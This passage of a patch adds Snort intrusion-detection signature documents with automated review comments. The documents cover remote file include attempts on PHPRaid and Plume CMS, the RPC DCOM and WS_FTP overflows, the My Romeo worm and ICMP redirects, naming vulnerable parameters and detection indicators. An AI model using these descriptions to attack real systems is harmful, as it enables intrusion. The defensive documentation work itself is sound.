+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. perl may also be requested on a command line should the attacker gain access to the machine. Whenever possible, all perl scripts on the host should be written using the restriceted access mode. This forces perl to execute the scripts in a "sandbox" which will disallow unsafe operations in the code.
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+sid: 1349
+
+--
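Review bot: The Sid field says 1350 but the file is doc/signatures/1356.txt; one of the two is wrong, and a lookup of sid 1356 will show a document describing a different rule. Fix before merging. Also missing here: an Affected Systems section (every other file has one), a blank line before "--" after Corrective Action (there is one after the heading instead), "it's designated web root" should be "its", and "restriceted" should be "restricted". The Additional References entry "sid: 1349" should say what rule 1349 is, since a bare number is not a reference.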
--- /dev/null
+++ b/doc/signatures/100000718.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000718
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "guilds.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "guilds.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
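Review bot: The Sid, Affected Systems and Contributors sections run straight into "--" without the blank line the other files use, and the file starts with two blank lines and ends with an extra one; normalize to the layout of the rest of the patch. Content-wise it carries the same generic paragraph about validating client credentials, which does not describe a remote file include via "phpraid_dir" and should be dropped, plus "ona" and "has been attempted".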
--- /dev/null
+++ b/doc/signatures/3346.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3346
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
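Review bot: This file is a verbatim copy of 3259.txt, down to the "Expoit" typo and the Attack Scenarios paragraph that describes an overly long filename on a network share rather than the malformed RPC request named in Detailed Information. If sid 3346 detects a different request pattern from sid 3259, the Summary should say what differs; if not, fix the same errors in both rather than shipping two diverging copies.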
--- /dev/null
+++ b/doc/signatures/842.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+842
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
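Review bot: Identical text to 1931.txt, including "running ona web server" and the over-long line in Detailed Information; the same comment applies: name the CGI script the rule matches so the document is specific to sid 842, and fix the typo in both files.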
--- /dev/null
+++ b/doc/signatures/1757.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1757
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
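Review bot: Identical to 1150.txt word for word. As there, the Summary should state which request the signature matches rather than "a known vulnerability on a web server", otherwise sids 1150 and 1757 cannot be told apart from their documentation, and Additional References should be filled in.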
--- /dev/null
+++ b/doc/signatures/1279.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+1279
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) snmpXdmi is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port snmpXdmi is using.  Attackers can also learn what versions of the snmpXdmi protocol are accepted by snmpXdmi.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as snmpXdmi run.  Simple Network Management Protocol (SNMP) and Desktop Management Interface (DMI) are remote management protocols.  The snmpXdmi RPC service translates between SNMP and DMI allowing, the use of either or both.  There is a buffer overflow when translating DMI to SNMP that allows access with the privilege level of snmpXdmi.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, and 8.0.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where snmpXdmi runs.  This may be a precursor to accessing snmpXdmi.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access snmpXdmi, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for snmpXdmi, not probes of the snmpXdmi service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the snmpXdmi service itself. An attacker may attempt to go directly to the snmpXdmi port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0236
+
+CERT
+http://www.cert.org/advisories/CA-2001-05.html
+
+Bugtraq
+http://www.securityfocus.com/bid/2417
+
+
+--
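Review bot: "allowing, the use of either or both" in Detailed Information has a misplaced comma; it should read "allowing the use of either or both". The False Negatives paragraph is the right kind of caveat (portmapper probe versus direct access to the service port); Corrective Action should match it by adding "apply the vendor patch referenced in CA-2001-05", since limiting and filtering RPC access does not address the overflow the detail text describes. Minor: two blank lines before the closing "--".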
--- /dev/null
+++ b/doc/signatures/2461.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2461
+
+--
+Summary:
+This event is generated when a user on a host in your network that is 
+running Yahoo Instant Messenger is viewing a webcam or listening to an 
+audio message of another Yahoo IM user.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be 
+appropriate in certain network environments.
+
+--
+Detailed Information:
+This event indicates that a Yahoo IM user in your network is requesting 
+to view a webcam of another Yahoo IM user.  While there are no known 
+exploits associated with showing or viewing webcams, or listening to 
+audio messages.  it is possible that this activity is inappropriate in 
+certain environments.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attack scenarios.
+
+--
+Ease of Attack:
+No known attack scenarios.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the 
+default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or 
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
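Review bot: the Ease of Attack section repeats the Attack Scenarios text (`No known attack scenarios.`) instead of describing ease of attack; for a policy rule something like "Not applicable, this is a policy detection" reads correctly. In Detailed Information the sentence `While there are no known exploits associated with showing or viewing webcams, or listening to audio messages.  it is possible that ...` is cut in two by a full stop; join it with a comma. Detailed Information also covers only webcam viewing while the Summary includes audio messages; make the two agree. Lastly the blank line before the `--` separator is missing after `Judy Novak <judy.novak@sourcefire.com>`, unlike every other section in this file.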
--- /dev/null
+++ b/doc/signatures/735.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+735
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
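Review bot: several spelling errors: `specifcally` and `propogation` in the Summary, `propogates` and `WIndows` in Detailed Information, and `Known As` should be lower case. In Corrective Action `This worm makes changes to the system registry, removal of the affected registry keys should be done ...` is a comma splice; split it into two sentences. Detailed Information says the worm exploits `versions of Microsoft Outlook and Internet Explorer` without naming which ones, while Affected Systems lists only operating systems; naming the affected application versions would let an operator decide whether the patch advice in Corrective Action applies.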
--- /dev/null
+++ b/doc/signatures/2219.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2219
+
+--
+Summary:
+This event is generated when an attempt is made to access setpasswd.cgi on an internal web server. This may indicate an attempt to exploit an authentication vulnerability in Trend Micro Interscan VirusWall 3.0.1 and 3.6.x.
+
+--
+Impact:
+Information disclosure, VirusWall administrative access.
+
+--
+Detailed Information:
+Trend Micro Interscan VirusWall contains an authentication vulnerability in versions 3.6.x and lower. When an administrative user changes their VirusWall account password using setpasswd.cgi, the username and password are transmitted in clear text. If an attacker is monitoring network traffic, he/she can obtain the username and password for VirusWall administration.
+
+--
+Affected Systems:
+Systems running Trend Micro Interscan VirusWall 3.0.1 or 3.6.x.
+
+--
+Attack Scenarios:
+An attacker is monitoring network traffic and intercepts the HTTP message that contains the VirusWall administrator's username and password. The attacker can then use this information to log into VirusWall and make changes to system configuration that may leave the network more open to compromise.
+ 
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses setpasswd.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer version of Trend Micro VirusWall. Otherwise, do not use web-based configuration tools.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2212
+
+--
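Review bot: the affected versions are inconsistent: the Summary and Affected Systems say `Trend Micro Interscan VirusWall 3.0.1 and 3.6.x`, but Detailed Information says `versions 3.6.x and lower`; pick one statement and use it throughout. The separator before Additional References is `-- ` with a trailing space. In Corrective Action, `do not use web-based configuration tools` would be clearer if it restated why: the account name and password travel in clear text, as Detailed Information explains, so the exposure is on the wire and not in the CGI itself.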
--- /dev/null
+++ b/doc/signatures/1888.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+1188
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in WS_FTP.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Executing  site cpwd with an specially crafted argument can cause a buffer
+overflow in WS_FTP that would allow arbitrary code to be run on the ftp
+server.
+
+The 'site cpwd' command seems to be unique to ws_ftp. This command is used
+to allow users to change there passwords while using an ftp session. It is
+possible to execute 'site cpwd' with an specially crafted argument can cause
+a buffer overflow in WS_FTP. This would allow arbitrary code to be run on
+the ftp server. This requires that the user be logged into the ftp server
+before executing the 'site cpwd' command.
+
+--
+Affected Systems:
+	WS_FTP up to an including 3.12
+
+--
+Attack Scenarios:
+An attacker needs to authenticate to an ftp server running the affected
+software then supply a specially crafted command to cause the buffer
+overflow condition to occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+'site cpwd' is a valid command on ws_ftp and users may be allowed to change
+their passwords.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+Consider using scp as a secure replacement for ftp.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
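Review bot: the file is `doc/signatures/1888.txt` but the Sid field reads `1188`; one of the two is wrong and the document will not be paired with its rule. Detailed Information repeats itself: the first paragraph is restated inside the second, and `It is possible to execute 'site cpwd' with an specially crafted argument can cause a buffer overflow` is not a sentence. Also fix `an specially crafted` (twice), `there passwords` (their), and `up to an including 3.12` (and). Additional References is empty for a named, versioned vulnerability; add the vendor advisory or tracker entry this rule was written from.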
--- /dev/null
+++ b/doc/signatures/3402.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3402
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
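Review bot: this document is identical to `doc/signatures/3295.txt` later in this patch apart from the Sid, so nothing tells the reader what distinguishes rule 3402 from 3295 (different transport, different port, different pattern?); add a sentence on that. The Attack Scenarios text (`a request for a file with an overly long filename via a network share`) does not obviously connect to the `malformed data via RPC` in Detailed Information; explain how the long name reaches the RPC interface. Typo: `Expoit code exists`. Additional References is empty although the text cites a vendor patch; link the vendor bulletin.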
--- /dev/null
+++ b/doc/signatures/965.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+965
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	Systems using Microsoft FrontPage Server Extensions 98
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=http://support.microsoft.com:80/support/kb/articles/Q188/2/57.ASP&NoWebContent=1&NoWebContent=1
+
+--
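Review bot: the Microsoft URL under Additional References carries the query parameter twice (`&NoWebContent=1&NoWebContent=1`); drop the duplicate. `attackers choosing` should be `attacker's choosing`. Detailed Information says the vulnerabilities `are legion` but names none, and Affected Systems lists only `FrontPage Server Extensions 98`; state which request pattern the rule actually matches so the reader can judge the False Positives claim of `None known.`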
--- /dev/null
+++ b/doc/signatures/100000743.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000743
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "dbinstall.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "dbinstall.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
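Review bot: the third paragraph of Detailed Information and the Attack Scenarios section describe an authentication weakness (`supply his/her own credentials to gain access`), which does not match the remote file include in `dbinstall.php` via `_PX_config[manager_path]` that the Summary describes; replace them with the RFI scenario already stated in the first paragraph (a remote file supplied in the parameter is included and executed by the script). Formatting: two blank lines precede `Rule:`, and the `--` separators after `100000743`, after `All systems running CGI applications using Plume CMS` and after the contributor line lack the blank line used elsewhere. Typos: `ona web server`, `attackers choosing`.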
--- /dev/null
+++ b/doc/signatures/436.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+436
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect for the Type of Service and Host datagram.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
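Review bot: the `Affected Systems:` section present in every other file is missing here. The Impact section (`Redirect messages are normally an indication that a shorter route ... exists.`) describes normal behaviour rather than impact; move that sentence to Detailed Information and state the impact that Attack Scenarios already implies, namely that traffic can be steered through an attacker-chosen gateway. Corrective Action proposes ingress filtering of ICMP Type 5, but the Attack Scenarios names attackers on the local subnet, whom perimeter ingress filtering does not stop; mention host configuration that ignores redirects as well. Grammar: `datagrams destination` (datagram's), `is then forward to` (forwarded). The reference `RFC792` should be written `RFC 792` and given a URL like the other files' references.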
--- /dev/null
+++ b/doc/signatures/2987.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2987
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
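Review bot: Detailed Information is a verbatim copy of the Summary (`This event is generated when an attempt is made to create an AndX entry via SMB.`) and adds nothing; it should explain what an AndX request is and how it relates to the `winreg service` that appears only in Attack Scenarios. Impact is given as `Unknown.` while Attack Scenarios describes manipulating host settings through winreg; state that as the impact. The Corrective Action paragraph is the same RPC port list used for the DCOM documents; confirm it is the intended advice for SMB traffic on this rule.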
--- /dev/null
+++ b/doc/signatures/1632.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 1632
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
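Review bot: this file is identical to `doc/signatures/1631.txt` in this patch except for the Sid, so neither document says which chat client or protocol, or which activity (login, message, file transfer), rule 1632 matches; add that. No `Affected Systems:` section is present. Typo: `unkown external sources`. The contributor address `brian.caswell@sourcefire.com` differs from the `bmc@sourcefire.com` used in the other files.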
--- /dev/null
+++ b/doc/signatures/484.txt
@@ -0,0 +1,51 @@
+Rule:
+--
+Sid:
+484
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running Sniffer Pro/NetXRay software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running Sniffer Pro/NetXRay software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
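Review bot: typo `legimately` in False Positives. The blank line after `Rule:` that every other file has is missing. Corrective Action (`Block inbound ICMP echo requests.`) would be more useful with the trade-off that False Positives already hints at: blocking all echo requests also removes ordinary ping diagnostics, so filtering only at the perimeter or only for the identifying payload may be preferable.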
--- /dev/null
+++ b/doc/signatures/648.txt
@@ -0,0 +1,77 @@
+Rule:
+--
+Sid:
+648
+
+--
+Summary:
+A series of NOP instructions for Intel's x86 architecure was detected.
+
+--
+Impact:
+As part of an attack on a remote service, an attacker may attempt to
+take advantage of insecure coding practices in hopes of executing
